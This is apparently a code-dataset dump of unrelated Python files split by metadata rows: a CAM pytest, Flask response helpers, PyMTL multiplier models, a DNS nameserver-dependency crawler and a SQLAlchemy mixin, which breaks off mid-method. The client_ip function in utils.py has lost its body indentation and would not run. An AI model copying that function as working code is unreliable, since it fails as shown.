def numpy_image():
    # BGR uint8 test image loaded with OpenCV; shared by all CAM tests.
    return cv2.imread("examples/both.png")
# NOTE(review): ScoreCAM appears twice in the cam_method list below, so it is
# exercised twice per parameter combination — confirm whether intentional.
@pytest.mark.parametrize("cnn_model,target_layer_names", [
    (torchvision.models.resnet18, ["layer4[-1]", "layer4[-2]"]),
    (torchvision.models.vgg11, ["features[-1]"])
])
@pytest.mark.parametrize("batch_size,width,height", [
    (2, 32, 32),
    (1, 32, 40)
])
@pytest.mark.parametrize("target_category", [
    None,
    100
])
@pytest.mark.parametrize("aug_smooth", [
    False
])
@pytest.mark.parametrize("eigen_smooth", [
    True,
    False
])
@pytest.mark.parametrize("cam_method",
                         [ScoreCAM,
                          AblationCAM,
                          GradCAM,
                          ScoreCAM,
                          GradCAMPlusPlus,
                          XGradCAM,
                          EigenCAM,
                          EigenGradCAM,
                          LayerCAM,
                          FullGrad])
def test_all_cam_models_can_run(numpy_image, batch_size, width, height,
                                cnn_model, target_layer_names, cam_method,
                                target_category, aug_smooth, eigen_smooth):
    """Smoke test: every CAM method runs on every model/shape combination
    and yields one CAM per batch item with the input's spatial size."""
    img = cv2.resize(numpy_image, (width, height))
    input_tensor = preprocess_image(img)
    input_tensor = input_tensor.repeat(batch_size, 1, 1, 1)
    model = cnn_model(pretrained=True)
    target_layers = []
    for layer in target_layer_names:
        # Layer specs like "layer4[-1]" include indexing, so they are
        # resolved with eval against the model object.
        target_layers.append(eval(f"model.{layer}"))
    cam = cam_method(model=model,
                     target_layers=target_layers,
                     use_cuda=False)
    cam.batch_size = 4
    grayscale_cam = cam(input_tensor=input_tensor,
                        target_category=target_category,
                        aug_smooth=aug_smooth,
                        eigen_smooth=eigen_smooth)
    # One CAM per batch element, matching the input's HxW.
    assert(grayscale_cam.shape[0] == input_tensor.shape[0])
    assert(grayscale_cam.shape[1:] == input_tensor.shape[2:])
| 30.24 | 75 | 0.583774 |
acdf98a9c623604fa07d9cf49029e19210661f51 | 2,462 | py | Python | utils.py | alphagov/browser-listener | a073e0914aee72711a7f1d18fa3e8289c39095c9 | [
"MIT"
] | 1 | 2022-03-09T08:40:43.000Z | 2022-03-09T08:40:43.000Z | utils.py | alphagov/browser-listener | a073e0914aee72711a7f1d18fa3e8289c39095c9 | [
"MIT"
] | 5 | 2021-05-24T07:39:38.000Z | 2022-03-29T13:10:00.000Z | utils.py | alphagov/browser-listener | a073e0914aee72711a7f1d18fa3e8289c39095c9 | [
"MIT"
] | 2 | 2021-04-10T16:58:43.000Z | 2021-04-10T18:06:05.000Z | #!/usr/bin/env python3
import werkzeug.local
import flask.wrappers
def addHeaders(resp: "flask.wrappers.Response") -> "flask.wrappers.Response":
    """
    Adds the no cache headers to a response

    >>> from flask import Flask, make_response
    >>> app = Flask(__name__)
    >>> with app.app_context():
    ...     blank_resp = make_response("OK")
    >>> resp = addHeaders(blank_resp)
    >>> for h in resp.headers:
    ...     print(h)
    ('Content-Type', 'text/html; charset=utf-8')
    ('Content-Length', '2')
    ('X-Robots-Tag', 'noindex, nofollow, noimageindex')
    ('Cache-Control', 'public, max-age=0')
    ('Pragma', 'no-cache')
    ('Expires', '0')
    """
    resp.headers["X-Robots-Tag"] = "noindex, nofollow, noimageindex"
    # The original assigned Cache-Control twice ("no-cache, no-store,
    # must-revalidate" then "public, max-age=0"); only the second value ever
    # survived, so set it once — in this position so header order matches
    # the doctest above.
    resp.headers["Cache-Control"] = "public, max-age=0"
    resp.headers["Pragma"] = "no-cache"
    resp.headers["Expires"] = "0"
    return resp
def client_ip(request: werkzeug.local.LocalProxy) -> str:
"""
Gets the client IP address from a request
>>> from werkzeug.test import EnvironBuilder
>>> from werkzeug.wrappers import Request
>>> builder = EnvironBuilder(method='POST')
>>> env = builder.get_environ()
>>> req = Request(env)
>>> client_ip(req) is None
True
>>> builder = EnvironBuilder(method='POST',
... environ_overrides={'REMOTE_ADDR': '127.0.0.2'})
>>> env = builder.get_environ()
>>> req1 = Request(env)
>>> client_ip(req1)
'127.0.0.2'
>>> builder = EnvironBuilder(method='POST',
... environ_overrides={'HTTP_X_FORWARDED_FOR': '127.0.0.3, 127.0.0.2'})
>>> env = builder.get_environ()
>>> req2 = Request(env)
>>> client_ip(req2)
'127.0.0.3'
>>> builder = EnvironBuilder(method='POST',
... environ_overrides={'HTTP_X_FORWARDED_FOR': '::0, 127.0.0.2'})
>>> env = builder.get_environ()
>>> req3 = Request(env)
>>> client_ip(req3)
'::0'
"""
ips = None
if request.environ.get("HTTP_X_FORWARDED_FOR") is None:
ips = request.environ.get("REMOTE_ADDR")
else:
ips = request.environ["HTTP_X_FORWARDED_FOR"]
if ips:
if "," in ips:
return ips.split(",")[0].strip()
else:
return ips.strip()
if __name__ == "__main__":
    # If this module is run directly, exercise the docstring examples.
    # (The original used a bare string literal here — a no-op statement —
    # where a comment was intended.)
    import doctest

    doctest.testmod()
| 25.381443 | 77 | 0.5987 |
acdf98b672bb4980205117e9615e951c00222e93 | 131 | py | Python | rocat/__init__.py | chongkong/rocat | 4a75682436954de2bdc65376f2a6a98f1962531e | [
"MIT"
] | 11 | 2017-08-15T16:46:27.000Z | 2021-12-29T23:03:51.000Z | rocat/__init__.py | chongkong/rocat | 4a75682436954de2bdc65376f2a6a98f1962531e | [
"MIT"
] | 2 | 2019-06-13T06:41:38.000Z | 2019-12-27T15:47:52.000Z | rocat/__init__.py | chongkong/rocat | 4a75682436954de2bdc65376f2a6a98f1962531e | [
"MIT"
] | 1 | 2019-12-27T14:40:46.000Z | 2019-12-27T14:40:46.000Z | from .finder import find
from .executor import ActorExecutor
from .globals import g
from .role import BaseActorRole, DictFieldRole
| 26.2 | 46 | 0.832061 |
acdf98d3a14246a732ee9edd9e1ff1461f4c8933 | 12,591 | py | Python | lizard/util/rtl/multiply.py | cornell-brg/lizard | 7f9a78a913e64b5cfdee3a26223539ad225bd6da | [
"BSD-3-Clause"
] | 50 | 2019-05-22T08:43:15.000Z | 2022-03-21T23:58:50.000Z | lizard/util/rtl/multiply.py | cornell-brg/lizard | 7f9a78a913e64b5cfdee3a26223539ad225bd6da | [
"BSD-3-Clause"
] | 1 | 2019-07-27T18:51:52.000Z | 2019-08-02T01:20:22.000Z | lizard/util/rtl/multiply.py | cornell-brg/lizard | 7f9a78a913e64b5cfdee3a26223539ad225bd6da | [
"BSD-3-Clause"
] | 11 | 2019-12-26T06:00:48.000Z | 2022-03-27T02:29:35.000Z | from pymtl import *
from lizard.bitutil import clog2
from lizard.util.rtl.method import MethodSpec
from lizard.util.rtl.interface import Interface, UseInterface
from lizard.util.rtl.register import Register, RegisterInterface
class MulPipelinedInterface(Interface):
    """Method interface for a pipelined multiplier.

    Exposes: `mult` (push operands + signedness flags), `peek` (read the
    finished product), `take` (pop the result) and a `cl_helper_shift` hook.
    The result is 2*data_len bits wide when keep_upper is True, else data_len.
    """

    def __init__(s, data_len, keep_upper=True):
        s.DataLen = data_len
        s.KeepUpper = keep_upper
        super(MulPipelinedInterface, s).__init__([
            # Read the completed product without consuming it.
            MethodSpec(
                'peek',
                args=None,
                rets={
                    'res': Bits(2 * s.DataLen if keep_upper else s.DataLen),
                },
                call=False,
                rdy=True,
            ),
            # Consume (pop) the completed product.
            MethodSpec(
                'take',
                args=None,
                call=True,
                rdy=True,
            ),
            MethodSpec(
                'cl_helper_shift',
                args=None,
                rets=None,
                call=False,
                rdy=False,
            ),
            # Push a new multiply request into the pipeline.
            MethodSpec(
                'mult',
                args={
                    'src1': Bits(s.DataLen),
                    'src2': Bits(s.DataLen),
                    'src1_signed': Bits(1),
                    'src2_signed': Bits(1),
                },
                rets=None,
                call=True,
                rdy=True,
            ),
        ])
class MulRetimedPipelined(Model):
    """Pipelined multiplier built around one combinational multiply that a
    synthesis tool is expected to retime across `nstages` register stages.

    Signed operands are converted to unsigned up front; the result sign is
    applied (two's complement) when writing stage 0.
    """

    def __init__(s, mul_interface, nstages):
        UseInterface(s, mul_interface)
        assert nstages > 0
        m = s.interface.DataLen
        n = 2 * m if s.interface.KeepUpper else m
        # Per-stage valid bits and product registers.
        s.valids_ = [
            Register(RegisterInterface(1), reset_value=0) for _ in range(nstages)
        ]
        s.vals_ = [
            Register(RegisterInterface(n, enable=True)) for _ in range(nstages)
        ]
        s.exec_ = [Wire(Bits(1)) for _ in range(nstages)]
        s.rdy_ = [Wire(Bits(1)) for _ in range(nstages)]
        s.value_ = Wire(2 * m)
        # All the inputs get converted to unsigned
        s.src1_usign_ = Wire(Bits(m))
        s.src2_usign_ = Wire(Bits(m))
        s.sign_in_ = Wire(1)
        # Execute call
        s.connect(s.mult_rdy, s.rdy_[0])
        # Result call
        s.connect(s.peek_rdy, s.valids_[nstages - 1].read_data)
        s.connect(s.take_rdy, s.valids_[nstages - 1].read_data)
        s.connect(s.peek_res, s.vals_[nstages - 1].read_data)
        for i in range(nstages):
            s.connect(s.vals_[i].write_call, s.exec_[i])

        # HERE is the actual multiply that will be retimed
        @s.combinational
        def comb_mult():
            s.value_.v = s.src1_usign_ * s.src2_usign_

        # Convert operands to unsigned and compute the result's sign bit
        # (XOR of the effective operand signs).
        @s.combinational
        def unsign_srcs_in():
            s.src1_usign_.v = 0
            s.src2_usign_.v = 0
            s.sign_in_.v = 0
            s.sign_in_.v = (s.mult_src1_signed and s.mult_src1[m - 1]) ^ (
                s.mult_src2_signed and s.mult_src2[m - 1])
            s.src1_usign_.v = (~s.mult_src1 +
                               1) if (s.mult_src1[m - 1] and
                                      s.mult_src1_signed) else s.mult_src1
            s.src2_usign_.v = (~s.mult_src2 +
                               1) if (s.mult_src2[m - 1] and
                                      s.mult_src2_signed) else s.mult_src2

        @s.combinational
        def set_rdy_last():
            # Incoming call:
            s.rdy_[nstages -
                   1].v = s.take_call or not s.valids_[nstages - 1].read_data

        for i in range(nstages - 1):

            @s.combinational
            def set_rdy(i=i):
                # A stage is ready to accept if it is invalid or next stage is ready
                s.rdy_[i].v = not s.valids_[i].read_data or s.rdy_[i + 1]

        @s.combinational
        def set_exec_first():
            s.exec_[0].v = s.rdy_[0] and s.mult_call

        for i in range(1, nstages):

            @s.combinational
            def set_exec(i=i):
                # Will execute if stage ready and current work is valid
                s.exec_[i].v = s.rdy_[i] and s.valids_[i - 1].read_data

        @s.combinational
        def set_valids_last():
            s.valids_[nstages - 1].write_data.v = (
                not s.take_call and
                s.valids_[nstages - 1].read_data) or s.exec_[nstages - 1]

        for i in range(nstages - 1):

            @s.combinational
            def set_valids(i=i):
                # Valid if blocked on next stage, or executed this cycle
                s.valids_[i].write_data.v = (not s.rdy_[i + 1] and
                                             s.valids_[i].read_data) or s.exec_[i]

        # Stage 0 captures the (sign-corrected) product; later stages just
        # shift it along the pipeline.
        @s.combinational
        def mult():
            s.vals_[
                0].write_data.v = ~s.value_[:n] + 1 if s.sign_in_ else s.value_[:n]
            for i in range(1, nstages):
                s.vals_[i].write_data.v = s.vals_[i - 1].read_data
class MulPipelined(Model):
    """Explicitly staged pipelined multiplier.

    Each of the `nstages` stages multiplies the full multiplier by the next
    k = DataLen/nstages bits of the multiplicand (a MulCombinational unit per
    stage) and accumulates the shifted partial products. Sign handling:
    operands are made unsigned at the input; the last stage re-applies the
    sign via two's complement.
    """

    def __init__(s, mul_interface, nstages, use_mul=True):
        UseInterface(s, mul_interface)
        # For now must be evenly divisible
        assert nstages > 0
        assert s.interface.DataLen % nstages == 0
        m = s.interface.DataLen
        n = 2 * m if s.interface.KeepUpper else m
        k = s.interface.DataLen // nstages
        last = nstages - 1

        # All the inputs get converted to unsigned
        s.src1_usign_ = Wire(Bits(m))
        s.src2_usign_ = Wire(Bits(m))

        # At step i, i = [0, nstages), product needs at most m + k(i+1) bits
        s.valids_ = [
            Register(RegisterInterface(1), reset_value=0) for _ in range(nstages)
        ]
        if s.interface.KeepUpper:
            s.vals_ = [
                # nbits = m + k * (i + 1)
                Register(RegisterInterface(2 * m, enable=True))
                for i in range(nstages)
            ]
            s.units_ = [
                MulCombinational(
                    # input nbits = m,k, output = k+m
                    MulCombinationalInterface(m, k, 2 * m),
                    use_mul) for i in range(nstages)
            ]
            s.src2_ = [
                # nbits = m - k * i
                Register(RegisterInterface(m, enable=True))
                for i in range(nstages - 1)
            ]
        else:
            s.vals_ = [
                Register(RegisterInterface(m, enable=True)) for _ in range(nstages)
            ]
            s.units_ = [
                MulCombinational(MulCombinationalInterface(m, k, m), use_mul)
                for _ in range(nstages)
            ]
            s.src2_ = [
                Register(RegisterInterface(m, enable=True))
                for _ in range(nstages - 1)
            ]
        s.src1_ = [
            Register(RegisterInterface(m, enable=True)) for _ in range(nstages - 1)
        ]
        s.signs_ = [
            Register(RegisterInterface(1, enable=True)) for _ in range(nstages - 1)
        ]
        s.exec_ = [Wire(Bits(1)) for _ in range(nstages)]
        s.rdy_ = [Wire(Bits(1)) for _ in range(nstages)]
        s.sign_out_ = Wire(Bits(1))
        s.sign_in_ = Wire(Bits(1))

        # Connect the sign bit in the last stage
        if nstages == 1:
            s.connect_wire(s.sign_out_, s.sign_in_)
        else:
            s.connect(s.sign_out_, s.signs_[last - 1].read_data)

        # Execute call rdy
        s.connect(s.mult_rdy, s.rdy_[0])
        # Result call rdy
        s.connect(s.peek_rdy, s.valids_[last].read_data)
        s.connect(s.take_rdy, s.valids_[last].read_data)
        s.connect(s.peek_res, s.vals_[last].read_data)

        for i in range(nstages):
            s.connect(s.vals_[i].write_call, s.exec_[i])
            s.connect(s.units_[i].mult_call, s.exec_[i])
            # Last stage does not have these
            if i < nstages - 1:
                s.connect(s.src1_[i].write_call, s.exec_[i])
                s.connect(s.src2_[i].write_call, s.exec_[i])
                s.connect(s.signs_[i].write_call, s.exec_[i])

        # Take twos complement of negative signed operands; record the
        # result sign as the XOR of the effective operand signs.
        @s.combinational
        def unsign_srcs_in():
            s.src1_usign_.v = 0
            s.src2_usign_.v = 0
            s.sign_in_.v = 0
            s.sign_in_.v = (s.mult_src1_signed and s.mult_src1[m - 1]) ^ (
                s.mult_src2_signed and s.mult_src2[m - 1])
            s.src1_usign_.v = (~s.mult_src1 +
                               1) if (s.mult_src1[m - 1] and
                                      s.mult_src1_signed) else s.mult_src1
            s.src2_usign_.v = (~s.mult_src2 +
                               1) if (s.mult_src2[m - 1] and
                                      s.mult_src2_signed) else s.mult_src2

        # Stage 0 multiplies by the lowest k bits of src2.
        @s.combinational
        def connect_unit0():
            s.units_[0].mult_src1.v = s.src1_usign_
            s.units_[0].mult_src2.v = s.src2_usign_[:k]

        for i in range(1, nstages):

            @s.combinational
            def connect_unitk(i=i):
                s.units_[i].mult_src1.v = s.src1_[i - 1].read_data
                s.units_[i].mult_src2.v = s.src2_[i - 1].read_data[:k]

        @s.combinational
        def set_rdy_last():
            s.rdy_[last].v = s.take_call or not s.valids_[last].read_data

        for i in range(nstages - 1):

            @s.combinational
            def set_rdy(i=i):
                # A stage is ready to accept if it is invalid or next stage is ready
                s.rdy_[i].v = not s.valids_[i].read_data or s.rdy_[i + 1]

        @s.combinational
        def set_exec_first():
            s.exec_[0].v = s.rdy_[0] and s.mult_call

        for i in range(1, nstages):

            @s.combinational
            def set_exec(i=i):
                # Will execute if stage ready and current work is valid
                s.exec_[i].v = s.rdy_[i] and s.valids_[i - 1].read_data

        @s.combinational
        def set_valids_last():
            s.valids_[last].write_data.v = (
                not s.take_call and s.valids_[last].read_data) or s.exec_[last]

        for i in range(nstages - 1):

            @s.combinational
            def set_valids(i=i):
                # Valid if blocked on next stage, or executed this cycle
                s.valids_[i].write_data.v = (not s.rdy_[i + 1] and
                                             s.valids_[i].read_data) or s.exec_[i]

        # Hook up the pipeline stages
        if nstages == 1:

            @s.combinational
            def connect_stage():
                s.vals_[0].write_data.v = ~s.units_[
                    0].mult_res + 1 if s.sign_out_ else s.units_[0].mult_res
        else:

            @s.combinational
            def connect_first_stage():
                s.vals_[0].write_data.v = s.units_[0].mult_res
                s.src1_[0].write_data.v = s.src1_usign_
                s.src2_[0].write_data.v = s.src2_usign_ >> k
                s.signs_[0].write_data.v = s.sign_in_

            # Middle stages accumulate the shifted partial product and pass
            # src1 / remaining src2 bits / sign down the pipe.
            for i in range(1, nstages - 1):

                @s.combinational
                def connect_stage(i=i):
                    s.vals_[i].write_data.v = s.vals_[i - 1].read_data + (
                        s.units_[i].mult_res << (k * i))
                    s.src1_[i].write_data.v = s.src1_[i - 1].read_data
                    s.src2_[i].write_data.v = s.src2_[i - 1].read_data >> k
                    s.signs_[i].write_data.v = s.signs_[i - 1].read_data

            # Last stage accumulates and applies the sign (two's complement).
            @s.combinational
            def connect_last_stage():
                if s.sign_out_:
                    s.vals_[last].write_data.v = ~(s.vals_[last - 1].read_data +
                                                   (s.units_[last].mult_res <<
                                                    (k * last))) + 1
                else:
                    s.vals_[last].write_data.v = s.vals_[last - 1].read_data + (
                        s.units_[last].mult_res << (k * last))
class MulCombinationalInterface(Interface):
    """Interface for a single-cycle (combinational) multiplier.

    `mult` takes an unsigned multiplier and multiplicand of possibly
    different widths and returns a product truncated/zero-extended to
    product_nbits.
    """

    def __init__(s, multiplier_nbits, multiplicand_nbits, product_nbits):
        s.MultiplierLen = multiplier_nbits
        s.MultiplicandLen = multiplicand_nbits
        s.ProductLen = product_nbits
        super(MulCombinationalInterface, s).__init__([
            MethodSpec(
                'mult',
                args={
                    'src1': Bits(s.MultiplierLen),
                    'src2': Bits(s.MultiplicandLen),
                },
                rets={
                    'res': Bits(s.ProductLen),
                },
                call=True,
                rdy=False,
            ),
        ])
# Unsigned only!
class MulCombinational(Model):
    """Combinational multiplier.

    With use_mul=True it relies on the `*` operator (a hardware multiplier);
    otherwise it builds a shift-and-add array over the multiplicand bits.
    The raw product is then zero-extended or truncated to ProductLen.
    """

    def __init__(s, mul_interface, use_mul=True):
        UseInterface(s, mul_interface)
        assert s.interface.MultiplierLen >= s.interface.MultiplicandLen
        plen = s.interface.ProductLen
        res_len = s.interface.MultiplierLen + s.interface.MultiplicandLen
        s.tmp_res = Wire(res_len)

        if not use_mul:
            s.src1_ = Wire(plen)
            # tmps_[i] holds the partial sum after considering i multiplicand bits.
            s.tmps_ = [Wire(res_len) for _ in range(s.interface.MultiplicandLen + 1)]
            if plen >= s.interface.MultiplierLen:

                @s.combinational
                def src1_zext():
                    s.src1_.v = s.mult_src1
            else:

                @s.combinational
                def src1_truncate():
                    s.src1_.v = s.mult_src1[:plen]

            s.connect_wire(s.tmp_res, s.tmps_[s.interface.MultiplicandLen])

            # PYMTL_BROKEN Direction is inferred wrong:
            #s.connect_wire(s.tmps_[0], 0)
            @s.combinational
            def eval_base():
                s.tmps_[0].v = 0

            # Shift-and-add: add (src1 << (i-1)) when multiplicand bit i-1 is set.
            for i in range(1, s.interface.MultiplicandLen + 1):

                @s.combinational
                def eval(i=i):
                    s.tmps_[i].v = s.tmps_[i - 1]
                    if s.mult_src2[i - 1]:
                        s.tmps_[i].v = s.tmps_[i - 1] + (s.src1_ << (i - 1))
        else:

            @s.combinational
            def eval():
                s.tmp_res.v = (s.mult_src1 * s.mult_src2)

        # Now we need to zext or truncate to productlen
        if plen > res_len:

            @s.combinational
            def zext_prod():
                s.mult_res.v = zext(s.tmp_res, plen)
        else:

            @s.combinational
            def trunc_prod():
                s.mult_res.v = s.tmp_res[:plen]
| 29.907363 | 79 | 0.57009 |
acdf98ebb44ec72f69d20197ec3e898656941dcb | 1,544 | py | Python | get_single_dns.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | get_single_dns.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | get_single_dns.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | #coding=utf-8
import dns.resolver
import re
import time
import json
def find_domain(string):
    """Return the first dot-terminated token found in `string`.

    Matches one or more consecutive "label." groups (e.g. "www.example.com.")
    and returns the matched text, or the empty string when nothing matches.
    """
    match = re.search(r'(\S*?\.)+', string)
    return match.group() if match else ''
def resolve(domain):
    """Query the NS records of `domain`.

    Appends every nameserver (lowercased) to the module-global `ns` list for
    this domain, enqueues unseen nameservers onto the global `dqueue`, and
    records [domain, ns_list] in the global `result`. Resolution failures
    are silently ignored (returns '').
    """
    global dqueue
    global result
    ns = []
    try:
        answers = dns.resolver.query(domain, 'NS')
        for rdata in answers.rrset:
            ad = str(rdata).lower()
            # Membership test replaces the original manual flag loop.
            if ad not in dqueue:
                dqueue.append(ad)
            ns.append(ad)
        result.append([domain, ns])
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt / SystemExit
        # still propagate; DNS failures are treated as "no data".
        return ''
def separate(domain):
    """Resolve every parent suffix of `domain` that is not already known.

    For each suffix "frag[i:]..." of the domain, skip it if it was already
    resolved (f) or is itself one of the recorded nameservers (f2);
    otherwise resolve() it. Stops early once an already-resolved suffix is
    found. NOTE(review): indentation reconstructed from a whitespace-mangled
    source — confirm the nesting of the result-scan loop against the
    original repository.
    """
    global result
    frag = domain.split('.')
    for i in range(0, len(frag) - 1):
        f = 0
        f2 = 0
        temp = ''
        # Build the suffix frag[i] + '.' + ... + frag[-2] + '.'
        for j in range(i, len(frag) - 1):
            temp = temp + frag[j] + '.'
        for r in result:
            if r[0] == temp:
                f = 1
                break
            for ns in r[1]:
                if ns == temp:  # this domain is itself an authoritative nameserver
                    f2 = 1
                    break
            if f2 == 1:
                continue
        if f == 0 and f2 == 0:
            resolve(temp)
            #print temp
        if f == 1:
            break
class dependency():
    # Simple record pairing a domain with its nameserver list; serialized
    # to JSON via its __dict__ in get_single_dns().
    def __init__(self, d, n):
        self.domain = d
        self.ns = n
def get_single_dns(target):
    """Crawl the NS-dependency graph rooted at `target`.

    Resets the module-global work queue (`dqueue`) and `result` list, walks
    the queue breadth-first via separate() (which may enqueue new
    nameserver domains), then writes the collected dependencies as JSON to
    "<target>json" (the target is dot-terminated, so e.g. "example.com.json").
    Returns the number of resolved domains.
    """
    global dqueue
    global result
    dqueue = []
    result = []
    j = []
    if target[-1] != '.':
        target = target + '.'
    dqueue.append(target.lower())
    # Breadth-first walk: separate()/resolve() may append new domains.
    while dqueue:
        tempd = dqueue.pop(0)
        separate(tempd)
    for r in result:
        d = dependency(r[0], r[1])
        j.append(d.__dict__)
    # Context manager guarantees the file is closed even if serialization
    # or writing fails (the original leaked the handle on error).
    with open(target + "json", 'w') as output:
        output.write(json.dumps(j))
    return len(result)
| 17.747126 | 41 | 0.640544 |
acdf9a2f7575c849a4893a1dc6cee91e807da36d | 35,947 | py | Python | flask_sqlalchemy_booster/model_booster/queryable_mixin.py | inkmonk/flask-sqlalchemy-plus | c60cba605630a0a2dc43e3b7b23bdda572b11561 | [
"MIT"
] | 5 | 2015-12-30T09:08:47.000Z | 2018-04-20T09:12:23.000Z | flask_sqlalchemy_booster/model_booster/queryable_mixin.py | inkmonk/flask-sqlalchemy-plus | c60cba605630a0a2dc43e3b7b23bdda572b11561 | [
"MIT"
] | 12 | 2015-06-20T09:58:37.000Z | 2017-02-23T14:38:02.000Z | flask_sqlalchemy_booster/model_booster/queryable_mixin.py | inkmonk/flask-sqlalchemy-plus | c60cba605630a0a2dc43e3b7b23bdda572b11561 | [
"MIT"
] | 2 | 2020-04-12T15:05:05.000Z | 2021-08-11T04:11:14.000Z | # from sqlalchemy import func
from __future__ import absolute_import
from toolspy import subdict, remove_and_mark_duplicate_dicts, merge
from sqlalchemy.ext.associationproxy import AssociationProxyInstance
from sqlalchemy.ext.orderinglist import OrderingList
from sqlalchemy.orm import class_mapper
from sqlalchemy.sql.schema import UniqueConstraint
import six
from six.moves import range
from ..utils import cast_as_column_type
class QueryableMixin(object):
    """Contains all querying methods. Used for common ORM operations

    Attributes:
        _no_overwrite_(list): The list of attributes that should not be overwritten.
    """

    # Attributes that update()/update_without_commit() must never overwrite.
    _no_overwrite_ = []
    # Drop primary-key values from incoming kwargs when creating instances.
    _prevent_primary_key_initialization_ = True
    # Disallow changing the primary key through update calls.
    _prevent_primary_key_updation_ = True
    # Optional list of fields that may never be set from external input.
    _fields_forbidden_from_being_set_ = None
    # When True, update_or_new may match existing rows on unique keys
    # instead of only the primary key.
    allow_updation_based_on_unique_keys = False
    @classmethod
    def is_a_to_many_rel(cls, attr):
        # True if `attr` is a relationship with uselist=True
        # (one-to-many / many-to-many).
        return attr in cls.__mapper__.relationships and cls.__mapper__.relationships[attr].uselist

    @classmethod
    def is_a_to_one_rel(cls, attr):
        # True if `attr` is a scalar (many-to-one / one-to-one) relationship.
        return attr in cls.__mapper__.relationships and not cls.__mapper__.relationships[attr].uselist

    @classmethod
    def columns(cls):
        # All mapped Column objects of this model.
        return [c for c in class_mapper(cls).columns]

    @classmethod
    def unique_columns(cls):
        # Columns declared with unique=True.
        return [c for c in cls.columns() if c.unique]

    @classmethod
    def unique_column_names(cls):
        return [c.key for c in cls.unique_columns()]

    @classmethod
    def table(cls):
        return cls.__table__

    @classmethod
    def constraints(cls):
        return cls.table().constraints

    @classmethod
    def unique_constraints(cls):
        # Table-level UniqueConstraint objects (multi-column uniques).
        return [
            c for c in cls.constraints()
            if isinstance(c, UniqueConstraint)]

    @classmethod
    def unique_constraint_col_name_tuples(cls):
        return [c.columns.keys() for c in cls.unique_constraints()]

    @classmethod
    def primary_key_name(cls):
        # Assumes a single-column primary key (index [0]).
        return cls.__mapper__.primary_key[0].key

    @classmethod
    def primary_key(cls):
        # The mapped attribute (column property) of the primary key.
        return getattr(cls, cls.primary_key_name())

    def primary_key_value(self):
        # The primary-key value of this instance.
        return getattr(self, self.primary_key().name)

    @classmethod
    def column_names(cls):
        return list(cls.__mapper__.columns.keys())

    @classmethod
    def is_the_primary_key(cls, attr):
        return attr == cls.primary_key_name()

    @classmethod
    def mapped_rel_class(cls, attr):
        # Model class on the other side of relationship `attr`.
        mapped_rel = next(
            r for r in cls.__mapper__.relationships
            if r.key == attr)
        return mapped_rel.mapper.class_
    def update_without_commit(self, **kwargs):
        """Apply `kwargs` to this instance without committing the session.

        Values are first passed through pre_save_adapter() and
        _prepare_data_for_saving(); keys not in all_settable_keys(), plain
        properties and `_no_overwrite_` attributes are skipped. OrderingList
        relationships (including those behind association proxies) are
        reordered after assignment. Returns self.
        """
        cls = type(self)
        kwargs = cls.pre_save_adapter(kwargs, existing_instance=self)
        kwargs = self._prepare_data_for_saving(kwargs)
        for key, value in six.iteritems(kwargs):
            if key not in cls.all_settable_keys():
                continue
            # Skip unknown attributes and plain (read-only) properties.
            if not hasattr(cls, key) or isinstance(getattr(cls, key), property):
                continue
            if key not in self._no_overwrite_:
                try:
                    setattr(self, key, value)
                except Exception as e:
                    # NOTE(review): `e.message` is a Python 2 idiom; on
                    # Python 3 this raises AttributeError — confirm targets.
                    print(key, value, e.message)
                    raise
            if isinstance(getattr(self, key), OrderingList):
                getattr(self, key).reorder()
            elif isinstance(getattr(cls, key), AssociationProxyInstance):
                # Reorder the underlying collection behind the proxy too.
                target_name = getattr(cls, key).target_collection
                target_rel = getattr(self, target_name)
                if isinstance(target_rel, OrderingList):
                    target_rel.reorder()
        return self
    def commit(self):
        """Commits a transaction.
        """
        self.session.commit()

    def save(self):
        """Saves a model instance to db.

        Examples:
            >>> customer = Customer.new(name="hari")
            >>> customer.save()
        """
        self.session.add(self)
        self.session.commit()

    def delete(self, commit=True):
        """Deletes a model instance.

        Args:
            commit (bool): Commit immediately (default) or leave the delete
                pending in the session.

        Examples:
            >>> customer.delete()
        """
        self.session.delete(self)
        if commit:
            self.session.commit()
    def _isinstance(self, model, raise_error=True):
        """Checks if the specified model instance matches the class model.
        By default this method will raise a `ValueError` if the model is not of
        expected type.

        Args:
            model (Model) : The instance to be type checked
            raise_error (bool) : Flag to specify whether to raise error on
                type check failure

        Raises:
            ValueError: If `model` is not an instance of the respective Model
                class
        """
        # NOTE(review): `self.__model__` is not defined anywhere in this
        # mixin; this method appears copied from a service/manager class —
        # confirm that users of this method define `__model__`.
        rv = isinstance(model, self.__model__)
        if not rv and raise_error:
            raise ValueError('%s is not of type %s' % (model, self.__model__))
        return rv
    @classmethod
    def rollback_session(cls):
        # Roll back the shared session, discarding uncommitted changes.
        cls.session.rollback()
    @classmethod
    def _prepare_data_for_saving(cls, kwargs):
        """Returns a preprocessed dictionary of parameters.
        Use this to filter the kwargs passed to `new`, `create`,
        `build` methods.

        Drops primary-key values (when configured), converts empty strings
        to None, and recursively converts nested dicts/lists destined for
        relationship attributes into model instances via update_or_new(_all).

        Args:
            **kwargs: a dictionary of parameters
        """
        # kwargs.pop('csrf_token', None)
        attrs_to_delete = []
        for attr, val in kwargs.items():
            if cls.is_the_primary_key(attr) and cls._prevent_primary_key_initialization_:
                # Deleted after the loop to avoid mutating during iteration.
                attrs_to_delete.append(attr)
                # del kwargs[attr]
                continue
            if val == "":
                # Making an assumption that there is no good usecase
                # for setting an empty string. This will help prevent
                # cases where empty string is sent because of client
                # not clearing form fields to null
                kwargs[attr] = None
                continue
            if attr in class_mapper(cls).relationships and attr not in cls._no_overwrite_:
                rel = class_mapper(cls).relationships[attr]
                if rel.uselist:
                    if isinstance(val, list):
                        # List of dicts -> list of related instances.
                        if all(isinstance(v, dict) for v in val):
                            rel_cls = cls.mapped_rel_class(attr)
                            kwargs[attr] = rel_cls.update_or_new_all(
                                list_of_kwargs=val,
                                keys=None if rel_cls.allow_updation_based_on_unique_keys else [
                                    rel_cls.primary_key_name()]
                            )
                    elif isinstance(val, dict):
                        # Mapping collection: dict keyed by the collection's
                        # key column -> dict of related instances.
                        rel_cls = cls.mapped_rel_class(attr)
                        mapping_col = rel.collection_class().keyfunc.name
                        list_of_kwargs = [
